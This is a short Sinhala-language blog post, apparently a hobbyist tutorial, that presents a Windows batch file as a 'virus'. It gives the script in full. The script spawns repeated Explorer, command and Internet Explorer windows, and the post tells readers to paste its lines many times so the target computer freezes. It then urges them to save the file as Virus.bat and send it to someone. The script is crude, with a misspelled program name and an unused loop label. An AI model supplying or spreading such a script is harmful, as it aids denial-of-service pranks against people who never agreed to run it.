දරුණු virus එකක් ...,,

 මෙකනමි ටිකක් දරැනු සෙල්ලමක්
මොකද  ‍ මේකට පුලුවන් Computer එක Stuck කරන්න?  මෙන්න මේකයි සිද්ධිය මේ Code එක ගහලා හදාගන්න file එක කවුරැ හරි Open කරොත් Internet Explorer,My Document වගේ එවා දිගට හරහට Open වෙනවා.  කීපාරක් Open වෙනවාද කියන එක Virus එක හදන අපිට පාලනය කරන්න පුලුවන්!  


දැන් එහෙනමි මුලින්ම Note pad Open කරගන්න,Copy කරලා Paste කරගන්න


@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer

මම කලින් කියපු වාර ගාන හදාගන්න ඔනි මෙහෙමයි.start dir කියලා තියෙන තැන ඉදන් ප‍ටන්ගන්න ට‍ක තමන්ට ඔනි ගානක් Copy කරලා Paste කරගන්න,ඒ කියන්නේ දෙපාරක් ඔනි නමි,
@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer
start dir
start command
start iexpore.exe
start run
start explorer


 මෙ වගේ ඔිනි තරමක් Paste කරන්න,Paste කරන ගාන වැඩිවෙන කොට Computer එක Stuck වෙන්න බලනවා, 

අන්තිමට තමන් කැමති නමකින් Save කරන්න,නමේ අන්තිමට .bat කියලා තියලා ex : Virus.bat  

දැන් Virus එක හදලා ඉවරයිකාට හරි යවලා බලන්‍නකෝ මොකද වෙන්නේ කියලාතමන්ටම උත්සහ කරන්න ඔනි නමි Code එක වැඩිපුර Type නොකර උත්සහ කරලා බලන්න පුලුවන්  



0 අදහස්: